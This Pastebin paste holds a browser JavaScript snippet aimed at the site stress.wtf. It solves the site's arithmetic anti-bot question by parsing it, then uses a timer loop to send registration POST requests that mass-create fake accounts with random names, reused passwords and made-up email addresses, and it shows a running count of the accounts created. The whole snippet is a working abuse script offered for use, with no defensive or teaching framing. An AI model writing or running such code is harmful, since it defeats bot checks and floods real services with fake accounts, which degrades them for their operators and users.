Advertisement
Guest User

stress

a guest
Jun 30th, 2018
196
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.14 KB | None | 0 0
  1. setTimeout(() => {
  2. var i = 0;
  3. var time2 = Date.now();
  4. var math = parseInt(question.placeholder.replace(/How much is /gi, '').split("+")[0]) + parseInt(question.placeholder.replace(/\?/gi, '').split("+")[1]);
  5.  
  6. if (document.domain === "stress.wtf") {
  7. setTimeout(() => {
  8. let math = register.toString().replace(/\n/gi, '').split('"')[1];
  9. var shit = question.placeholder.replace(/\?/gi, '').split("+");
  10. var answer = parseInt(shit[0]) + parseInt(shit[1])
  11. setInterval(() => {
  12. let time = Date.now();
  13. let username = nick + Math.floor(Math.random() * 99999) + 1;
  14. let password = username;
  15. let email = username + "@gmail.com";
  16.  
  17. $.ajax({
  18. type: "POST",
  19. url: `${document.URL.split(":")[0]}://${document.domain}/panel/ajax/login.php?type=register`,
  20. json: false,
  21. headers: {
  22. 'accept': '*/*',
  23. 'accept-language': 'en-US,en;q=0.9',
  24. 'cache-control': 'no-cache',
  25. 'content-type': 'application/x-www-form-urlencoded',
  26. 'pragma': 'no-cache',
  27. },
  28. data: {
  29. username: username,
  30. password: password,
  31. rpassword: password,
  32. scode: Math.floor(Math.random() * 8999) + 1000,
  33. email: email,
  34. question: answer,
  35. answer: math,
  36. },
  37. }).success(() => {
  38. i++;
  39. document.body.innerHTML = "";
  40. document.body.innerHTML = "<center>created " + i + " accounts in " + Math.floor(((Date.now() - time2) / 1000)) + " seconds</center>";
  41. });
  42. }, interval);
  43. }, 1000);
  44. } else {
  45. window.location = "http://stress.wtf/panel/register.php";
  46. }
  47. }, 2000);
  48. // P.S: If you change anything you're a fucking skid xd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement